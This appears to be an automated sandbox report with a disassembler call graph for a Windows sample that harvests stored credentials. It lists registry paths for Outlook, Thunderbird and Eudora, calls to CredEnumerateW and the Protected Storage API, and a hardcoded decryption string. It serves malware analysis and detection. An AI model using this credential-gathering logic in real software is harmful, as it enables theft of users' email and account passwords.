40860b memset 33727->33729 33740 40821d 33728->33740 33919 410b62 RegEnumKeyExA 33729->33919 33731 408637 33732 4086d2 RegCloseKey 33731->33732 33734 40865c memset 33731->33734 33920 410a9c RegOpenKeyExA 33731->33920 33923 410b62 RegEnumKeyExA 33731->33923 33732->33728 33921 410add RegQueryValueExA 33734->33921 33737 408694 33922 40848b 10 API calls 33737->33922 33739 4086ab RegCloseKey 33739->33731 33924 410a9c RegOpenKeyExA 33740->33924 33742 40823f 33743 403cc6 33742->33743 33744 408246 memset 33742->33744 33752 4086e0 33743->33752 33925 410b62 RegEnumKeyExA 33744->33925 33746 4082bf RegCloseKey 33746->33743 33748 40826f 33748->33746 33926 410a9c RegOpenKeyExA 33748->33926 33927 4080ed 11 API calls 33748->33927 33928 410b62 RegEnumKeyExA 33748->33928 33751 4082a2 RegCloseKey 33751->33748 33929 4045db 33752->33929 33755 4088f7 33937 404656 33755->33937 33757 40872d 33757->33755 33759 408737 wcslen 33757->33759 33761 4088ef LocalFree 33759->33761 33767 40876a 33759->33767 33760 40872b CredEnumerateW 33760->33757 33761->33755 33762 40877a wcsncmp 33762->33767 33764 404734 3 API calls 33764->33767 33765 404785 FreeLibrary 33765->33767 33766 408812 memset 33766->33767 33768 40883c memcpy wcschr 33766->33768 33767->33761 33767->33762 33767->33764 33767->33765 33767->33766 33767->33768 33769 4088c3 LocalFree 33767->33769 33940 40466b _mbscpy 33767->33940 33768->33767 33769->33767 33770 410a9c RegOpenKeyExA 33770->33659 33771->33663 33941 410a9c RegOpenKeyExA 33772->33941 33774 402c7a 33775 402da5 33774->33775 33776 402c87 memset 33774->33776 33775->33668 33942 410b62 RegEnumKeyExA 33776->33942 33778 402d9c RegCloseKey 33778->33775 33779 410b1e 3 API calls 33780 402ce4 memset sprintf 33779->33780 33943 410a9c RegOpenKeyExA 33780->33943 33782 402d28 33783 402d3a sprintf 33782->33783 33944 402bd1 40 API calls 33782->33944 33945 410a9c RegOpenKeyExA 33783->33945 33786 402cb2 33786->33778 33786->33779 33789 402d9a 33786->33789 33946 402bd1 40 API calls 33786->33946 33947 
410b62 RegEnumKeyExA 33786->33947 33789->33778 33790->33671 33791->33675 33792->33679 33794 410816 33793->33794 33795 4107f1 FreeLibrary 33794->33795 33796 403ddd 33795->33796 33796->33684 33948 410a9c RegOpenKeyExA 33797->33948 33799 402ff9 33800 403006 memset 33799->33800 33801 40312c 33799->33801 33949 410b62 RegEnumKeyExA 33800->33949 33801->33688 33803 403122 RegCloseKey 33803->33801 33804 410b1e 3 API calls 33805 403058 memset sprintf 33804->33805 33950 410a9c RegOpenKeyExA 33805->33950 33807 403033 33807->33803 33807->33804 33808 4030a2 memset 33807->33808 33809 410b62 RegEnumKeyExA 33807->33809 33811 4030f9 RegCloseKey 33807->33811 33952 402db3 26 API calls 33807->33952 33951 410b62 RegEnumKeyExA 33808->33951 33809->33807 33811->33807 33814 4032d5 33813->33814 33815 4033a9 33813->33815 33953 4021b6 memset 33814->33953 33828 4034e4 memset memset 33815->33828 33817 4032e1 33954 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33817->33954 33819 4032ea 33820 4032f8 memset GetPrivateProfileSectionA 33819->33820 33955 4023e5 16 API calls 33819->33955 33820->33815 33825 40332f 33820->33825 33822 40339b strlen 33822->33815 33822->33825 33824 403350 strchr 33824->33825 33825->33815 33825->33822 33956 4021b6 memset 33825->33956 33957 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33825->33957 33958 4023e5 16 API calls 33825->33958 33829 410b1e 3 API calls 33828->33829 33830 40353f 33829->33830 33831 40357f 33830->33831 33832 403546 _mbscpy 33830->33832 33836 403985 33831->33836 33959 406d55 strlen _mbscat 33832->33959 33834 403565 _mbscat 33960 4033f0 19 API calls 33834->33960 33961 40466b _mbscpy 33836->33961 33840 4039aa 33842 4039ff 33840->33842 33962 40f460 memset memset 33840->33962 33983 40f6e2 33840->33983 33999 4038e8 21 API calls 33840->33999 33843 404785 FreeLibrary 33842->33843 33844 403a0b 33843->33844 33845 4037ca memset memset 33844->33845 34007 444551 memset 33845->34007 33848 4038e2 33848->33698 33911 40f334 334 API calls 
33848->33911 33850 40382e 33851 406f06 2 API calls 33850->33851 33852 403843 33851->33852 33853 406f06 2 API calls 33852->33853 33854 403855 strchr 33853->33854 33855 403884 _mbscpy 33854->33855 33856 403897 strlen 33854->33856 33857 4038bf _mbscpy 33855->33857 33856->33857 33858 4038a4 sprintf 33856->33858 34019 4023e5 16 API calls 33857->34019 33858->33857 33861 44b090 33860->33861 33862 40fb10 RegOpenKeyExA 33861->33862 33863 403e7f 33862->33863 33864 40fb3b RegOpenKeyExA 33862->33864 33874 40f96c 33863->33874 33865 40fb55 RegQueryValueExA 33864->33865 33866 40fc2d RegCloseKey 33864->33866 33867 40fc23 RegCloseKey 33865->33867 33868 40fb84 33865->33868 33866->33863 33867->33866 33869 404734 3 API calls 33868->33869 33870 40fb91 33869->33870 33870->33867 33871 40fc19 LocalFree 33870->33871 33872 40fbdd memcpy memcpy 33870->33872 33871->33867 34024 40f802 11 API calls 33872->34024 33875 4070ae GetVersionExA 33874->33875 33876 40f98d 33875->33876 33877 4045db 7 API calls 33876->33877 33881 40f9a9 33877->33881 33878 40fae6 33879 404656 FreeLibrary 33878->33879 33880 403e85 33879->33880 33886 4442ea memset 33880->33886 33881->33878 33882 40fa13 memset WideCharToMultiByte 33881->33882 33882->33881 33883 40fa43 _strnicmp 33882->33883 33883->33881 33884 40fa5b WideCharToMultiByte 33883->33884 33884->33881 33885 40fa88 WideCharToMultiByte 33884->33885 33885->33881 33887 410dbb 9 API calls 33886->33887 33888 444329 33887->33888 34025 40759e strlen strlen 33888->34025 33893 410dbb 9 API calls 33894 444350 33893->33894 33895 40759e 3 API calls 33894->33895 33896 44435a 33895->33896 33897 444212 65 API calls 33896->33897 33898 444366 memset memset 33897->33898 33899 410b1e 3 API calls 33898->33899 33900 4443b9 ExpandEnvironmentStringsA strlen 33899->33900 33901 4443f4 _strcmpi 33900->33901 33902 4443e5 33900->33902 33903 403e91 33901->33903 33904 44440c 33901->33904 33902->33901 33903->33478 33905 444212 65 API calls 33904->33905 33905->33903 33906->33660 33907->33664 
33908->33672 33909->33676 33910->33680 33911->33698 33912->33699 33913->33713 33914->33718 33915->33714 33917 40841c 33916->33917 33918 410a9c RegOpenKeyExA 33917->33918 33918->33727 33919->33731 33920->33731 33921->33737 33922->33739 33923->33731 33924->33742 33925->33748 33926->33748 33927->33751 33928->33748 33930 404656 FreeLibrary 33929->33930 33931 4045e3 LoadLibraryA 33930->33931 33932 404651 33931->33932 33933 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33931->33933 33932->33755 33932->33757 33932->33760 33934 40463d 33933->33934 33935 404643 33934->33935 33936 404656 FreeLibrary 33934->33936 33935->33932 33936->33932 33938 403cd2 33937->33938 33939 40465c FreeLibrary 33937->33939 33938->33770 33939->33938 33940->33767 33941->33774 33942->33786 33943->33782 33944->33783 33945->33786 33946->33786 33947->33786 33948->33799 33949->33807 33950->33807 33951->33807 33952->33807 33953->33817 33954->33819 33955->33820 33956->33824 33957->33825 33958->33825 33959->33834 33960->33831 33961->33840 34000 4078ba 33962->34000 33965 4078ba _mbsnbcat 33966 40f5a3 RegOpenKeyExA 33965->33966 33967 40f5c3 RegQueryValueExA 33966->33967 33968 40f6d9 33966->33968 33969 40f6d0 RegCloseKey 33967->33969 33970 40f5f0 33967->33970 33968->33840 33969->33968 33970->33969 33971 40f675 33970->33971 34004 40466b _mbscpy 33970->34004 33971->33969 34005 4012ee strlen 33971->34005 33973 40f611 33975 404734 3 API calls 33973->33975 33980 40f616 33975->33980 33976 40f69e RegQueryValueExA 33976->33969 33977 40f6c1 33976->33977 33977->33969 33978 40f66a 33979 404785 FreeLibrary 33978->33979 33979->33971 33980->33978 33981 40f661 LocalFree 33980->33981 33982 40f645 memcpy 33980->33982 33981->33978 33982->33981 34006 40466b _mbscpy 33983->34006 33985 40f6fa 33986 4045db 7 API calls 33985->33986 33987 40f708 33986->33987 33988 40f7e2 33987->33988 33989 404734 3 API calls 33987->33989 33990 404656 FreeLibrary 33988->33990 33994 40f715 33989->33994 33991 40f7f1 
33990->33991 33992 404785 FreeLibrary 33991->33992 33993 40f7fc 33992->33993 33993->33840 33994->33988 33995 40f797 WideCharToMultiByte 33994->33995 33996 40f7b8 strlen 33995->33996 33997 40f7d9 LocalFree 33995->33997 33996->33997 33998 40f7c8 _mbscpy 33996->33998 33997->33988 33998->33997 33999->33840 34001 4078e6 34000->34001 34002 4078c7 _mbsnbcat 34001->34002 34003 4078ea 34001->34003 34002->34001 34003->33965 34004->33973 34005->33976 34006->33985 34020 410a9c RegOpenKeyExA 34007->34020 34009 44458b 34010 40381a 34009->34010 34021 410add RegQueryValueExA 34009->34021 34010->33848 34018 4021b6 memset 34010->34018 34012 4445dc RegCloseKey 34012->34010 34013 4445a4 34013->34012 34022 410add RegQueryValueExA 34013->34022 34015 4445c1 34015->34012 34023 444879 30 API calls 34015->34023 34017 4445da 34017->34012 34018->33850 34019->33848 34020->34009 34021->34013 34022->34015 34023->34017 34024->33871 34026 4075c9 34025->34026 34027 4075bb _mbscat 34025->34027 34028 444212 34026->34028 34027->34026 34045 407e9d 34028->34045 34031 44424d 34032 444274 34031->34032 34033 444258 34031->34033 34053 407ef8 34031->34053 34034 407e9d 9 API calls 34032->34034 34070 444196 52 API calls 34033->34070 34041 4442a0 34034->34041 34036 407ef8 9 API calls 34036->34041 34037 4442ce 34067 407f90 34037->34067 34041->34036 34041->34037 34043 444212 65 API calls 34041->34043 34063 407e62 34041->34063 34042 407f90 FindClose 34044 4442e4 34042->34044 34043->34041 34044->33893 34046 407f90 FindClose 34045->34046 34047 407eaa 34046->34047 34048 406f06 2 API calls 34047->34048 34049 407ebd strlen strlen 34048->34049 34050 407ee1 34049->34050 34051 407eea 34049->34051 34071 4070e3 strlen _mbscat _mbscpy _mbscat 34050->34071 34051->34031 34054 407f03 FindFirstFileA 34053->34054 34055 407f24 FindNextFileA 34053->34055 34056 407f3f 34054->34056 34057 407f46 strlen strlen 34055->34057 34058 407f3a 34055->34058 34056->34057 34060 407f7f 34056->34060 34057->34060 34061 407f76 34057->34061 34059 
407f90 FindClose 34058->34059 34059->34056 34060->34031 34072 4070e3 strlen _mbscat _mbscpy _mbscat 34061->34072 34064 407e94 34063->34064 34065 407e6c strcmp 34063->34065 34064->34041 34065->34064 34066 407e83 strcmp 34065->34066 34066->34064 34068 407fa3 34067->34068 34069 407f99 FindClose 34067->34069 34068->34042 34069->34068 34070->34031 34071->34051 34072->34060 34073->33492 34074->33496 34075->33503 34076->33502 34077->33509 34078->33506 34079->33501 34424 43ffc8 18 API calls 34238 4281cc 15 API calls 34426 4383cc 110 API calls 34239 4275d3 41 API calls 34427 4153d3 22 API calls 34240 444dd7 _XcptFilter 34432 4013de 15 API calls 34434 425115 111 API calls 34435 43f7db 18 API calls 34438 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34242 4335ee 16 API calls 34440 429fef 11 API calls 34243 444deb _exit _c_exit 34441 40bbf0 138 API calls 34246 425115 79 API calls 34445 437ffa 22 API calls 34250 4021ff 14 API calls 34251 43f5fc 149 API calls 34446 40e381 9 API calls 34253 405983 40 API calls 34254 42b186 27 API calls 34255 427d86 76 API calls 34256 403585 20 API calls 34258 42e58e 18 API calls 34261 425115 75 API calls 34263 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34450 434395 16 API calls 34265 441d9c memcmp 34452 43f79b 119 API calls 34266 40c599 43 API calls 34453 426741 87 API calls 34270 4401a6 21 API calls 34272 426da6 memcpy memset memset memcpy 34273 4335a5 15 API calls 34275 4299ab memset memset memcpy memset memset 34276 40b1ab 8 API calls 34458 425115 76 API calls 34462 4113b2 18 API calls 34466 40a3b8 memset sprintf SendMessageA 34080 410bbc 34083 4109cf 34080->34083 34084 4109dc 34083->34084 34085 410a23 memset GetPrivateProfileStringA 34084->34085 34086 4109ea memset 34084->34086 34091 407646 strlen 34085->34091 
34096 4075cd sprintf memcpy 34086->34096 34089 410a0c WritePrivateProfileStringA 34090 410a65 34089->34090 34092 40765a 34091->34092 34093 40765c 34091->34093 34092->34090 34095 4076a3 34093->34095 34097 40737c strtoul 34093->34097 34095->34090 34096->34089 34097->34093 34278 40b5bf memset memset _mbsicmp

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
APIs
• memset.MSVCRT ref: 0040832F
• memset.MSVCRT ref: 00408343
• memset.MSVCRT ref: 0040835F
• memset.MSVCRT ref: 00408376
• GetComputerNameA.KERNEL32(?,?), ref: 00408398
• GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
• strlen.MSVCRT ref: 004083E9
• strlen.MSVCRT ref: 004083F8
• memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
Strings
Memory Dump Source
• Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
• Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
• Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
• Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
• FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
• strlen.MSVCRT ref: 00407F5C
• strlen.MSVCRT ref: 00407F64
Strings
Memory Dump Source
• Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID: ACD
• API String ID: 379999529-620537770
• Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
• Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                                                                      • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402003
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402086
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402018
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                                      • API String ID: 1846531875-4223776976
                                                                                                                                                                                                                                      • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                                                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,762D0A60,?,00000000,?,?,?,0040CF60,762D0A60), ref: 00404AB8
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,762D0A60), ref: 00404ADE
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                                      • API String ID: 745651260-375988210
                                                                                                                                                                                                                                      • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                                                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                                                                      • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                                      • API String ID: 1197458902-317895162
                                                                                                                                                                                                                                      • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                                      • String ID: h4ND

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
